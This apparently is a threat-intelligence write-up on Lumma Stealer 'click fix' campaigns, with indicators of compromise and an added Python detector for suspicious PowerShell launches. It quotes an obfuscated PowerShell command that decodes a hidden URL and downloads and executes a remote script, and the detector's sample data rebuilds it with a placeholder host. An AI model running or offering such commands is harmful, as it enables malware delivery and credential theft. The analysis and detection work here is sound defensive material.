Lumma Stealer Launches “Click Fix” Style Attack via Fake Google Meet & Windows Update Sites

Recent investigations from Palo Alto have shed light on the evolving landscape of “click fix” campaigns used to distribute the Lumma Stealer malware. These campaigns exploit user interaction by placing a malicious script in the victim's clipboard and then deceiving the victim into pasting and executing it.

The “click fix” distribution method is characterized by malicious web pages that present users with seemingly benign instructions. Victims are prompted to open the Windows Run dialog, paste the PowerShell command the page has already copied to their clipboard, and execute it. This approach takes advantage of user trust, often masquerading as a legitimate service so that the request raises no suspicion.

Attackers are continuously refining their strategies to evade detection and enhance the success rates of these campaigns. Recent developments include:

  • Domain Impersonation: Registering domain names that closely resemble legitimate services to gain user trust, such as windows-update[.]site.
  • Abuse of Trusted Platforms: Hosting malicious pages on reputable platforms, including Google Sites.
  • PowerShell Script Delivery: Serving files that mix ASCII text with binary data (for example under a media file extension) so that the download still executes as a PowerShell script.
  • DLL Side-Loading: Distributing zip archives containing decoy files alongside legitimate executables to facilitate the side-loading of Lumma Stealer DLLs.

Malicious Activity

Example 1: Fake Google Meet Page

A fraudulent Google Meet page hosted on sites.google[.]com instructs users to execute a PowerShell command that downloads and runs a script from tlgrm-redirect[.]icu. The infection process unfolds as follows:

  1. Downloading a zip archive from plsverif[.]cfd/1.zip that contains Lumma Stealer files.
  2. Extracting and executing a DLL file, DuiLib_u.dll, through side-loading.

Example 2: Fake Windows Update Site

The site windows-update[.]site prompts users to run a PowerShell command that downloads a file from overcoatpassably[.]shop/Z8UZbPyVpGfdRS/maloy[.]mp4. This file is crafted with ASCII text and binary data, enabling it to function as a PowerShell script.

The PowerShell commands employed in these campaigns are meticulously designed to obscure malicious intent. For instance:

```powershell
powershell -w hidden -c $a='[base64 text removed]'; $b=[Convert]::FromBase64String($a);$c=[System.Text.Encoding]::UTF8.GetString($b);Invoke-Expression (Invoke-WebRequest -Uri $c).Content
```

This command runs with a hidden window, decodes the Base64 text into a URL, fetches the malicious script from that address with Invoke-WebRequest, and executes the downloaded content in memory via Invoke-Expression, so no script file is written to disk.
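The command above is recognisable in process-creation telemetry by its combination of a hidden window, a Base64 decode, a web download and Invoke-Expression. The following detector is an added example for defenders, not code from the article or from Palo Alto: it scores PowerShell command lines on those traits, decodes any Base64 literal that turns out to be a URL so the analyst can see where the second stage was fetched from, and defangs that URL for reporting. The log events and the host example.invalid are constructed for the demo and are not indicators from the campaign.

```python
"""Flag click-fix-style PowerShell launches in process-creation logs.

Added example (not from the original article). The sample events below are
constructed; the host they reference is a placeholder, not a real indicator.
"""
import base64
import re
from dataclasses import dataclass
from urllib.parse import urlsplit

# Traits of the command shown in the article: hidden window, Base64 decode,
# a download cmdlet, and Invoke-Expression over the downloaded content.
SUSPICIOUS_TRAITS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "base64_decode": re.compile(r"FromBase64String", re.I),
    "download": re.compile(r"Invoke-WebRequest|\biwr\b|DownloadString", re.I),
    "eval": re.compile(r"Invoke-Expression|\biex\b", re.I),
}

# A single-quoted PowerShell string literal that looks like Base64.
B64_LITERAL = re.compile(r"'([A-Za-z0-9+/]{16,}={0,2})'")


@dataclass
class Finding:
    traits: list       # names from SUSPICIOUS_TRAITS that matched
    decoded_urls: list  # URLs recovered from Base64 literals
    score: int          # one point per trait, plus two if a URL was recovered


def decode_b64_urls(cmdline):
    """Decode every Base64-looking literal (UTF-8, as in the sample) and keep the URLs."""
    urls = []
    for match in B64_LITERAL.finditer(cmdline):
        try:
            text = base64.b64decode(match.group(1), validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue
        if re.match(r"https?://", text, re.I):
            urls.append(text)
    return urls


def analyze_command_line(cmdline):
    """Score one command line and recover any Base64-hidden download URL."""
    traits = [name for name, rx in SUSPICIOUS_TRAITS.items() if rx.search(cmdline)]
    urls = decode_b64_urls(cmdline)
    return Finding(traits, urls, len(traits) + (2 if urls else 0))


def defang(url):
    """Bracket the dots of the host (and break the scheme) the way the article writes indicators."""
    parts = urlsplit(url)
    scheme = parts.scheme.replace("http", "hxxp")      # http -> hxxp, https -> hxxps
    return f"{scheme}://{parts.netloc.replace('.', '[.]')}{parts.path}"


def scan_events(events, threshold=3):
    """Return (image, Finding) for PowerShell events whose score reaches the threshold."""
    hits = []
    for image, cmdline in events:
        if "powershell" not in image.lower() and "powershell" not in cmdline.lower():
            continue
        finding = analyze_command_line(cmdline)
        if finding.score >= threshold:
            hits.append((image, finding))
    return hits


# Constructed sample events (image, command line); not captured telemetry.
_PAYLOAD_URL = "https://example.invalid/1.txt"     # placeholder stage-2 address
_B64 = base64.b64encode(_PAYLOAD_URL.encode()).decode()
SAMPLE_EVENTS = [
    ("powershell.exe",
     f"powershell -w hidden -c $a='{_B64}'; $b=[Convert]::FromBase64String($a);"
     "$c=[System.Text.Encoding]::UTF8.GetString($b);"
     "Invoke-Expression (Invoke-WebRequest -Uri $c).Content"),
    ("powershell.exe", "powershell -NoProfile -Command Get-Process | Sort-Object CPU"),
    ("cmd.exe", "cmd /c dir C:\\Users"),
]

if __name__ == "__main__":
    for image, finding in scan_events(SAMPLE_EVENTS):
        print(image, finding.score, finding.traits,
              [defang(u) for u in finding.decoded_urls])
```

The threshold of three traits keeps ordinary administrative PowerShell (which rarely combines a hidden window, a Base64 decode and Invoke-Expression in one line) out of the alert queue, while the recovered URL gives the responder the host to block and to search for in proxy logs. The decoder only handles UTF-8 literals as in the article's sample; a variant using -EncodedCommand would need a UTF-16LE decode instead.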

Malicious traffic patterns observed during these infections include:

  • HTTP POST requests to tlgrmverif[.]cyou/log.php, confirming the successful execution of various stages.
  • Downloads from domains such as plsverif[.]cfd and overcoatpassably[.]shop.

Active Lumma Stealer C2 Domains

Currently active command-and-control (C2) domains for Lumma Stealer include:

  • web-security3[.]com
  • techspherxe[.]top

In contrast, inactive C2 domains that no longer resolve are:

  • hardswarehub[.]today
  • earthsymphzony[.]today

Key files associated with these campaigns encompass:

  1. A PowerShell script retrieved from tlgrm-redirect[.]icu/1.txt (SHA256: 909ed8a135…).
  2. A zip archive containing Lumma Stealer files from plsverif[.]cfd/1.zip (SHA256: 0608775a345…).
  3. A DLL that is side-loaded by a legitimate executable (DuiLib_u.dll, SHA256: b3e8b610ef…).

Indicators of Compromise

Active Domains Hosting Malicious Pages

  1. windows-update[.]site (registered February 19, 2025)
  2. sites[.]google[.]com/view/get-access-now-test/verify-your-account

Associated Domains

Domains linked to these campaigns include:

  • authentication-safeguard[.]com (registered January 17, 2025)
  • plsverif[.]cfd (registered March 1, 2025)
  • tlgrmverif[.]cyou (registered January 11, 2025)

The ongoing evolution of tactics in these “click fix” campaigns underscores the sophistication of modern malware distribution techniques. By leveraging trusted platforms and employing advanced obfuscation methods, attackers are adeptly circumventing traditional detection mechanisms. It is imperative for organizations to remain vigilant, implement robust security measures, and educate users about the risks associated with executing unverified scripts.
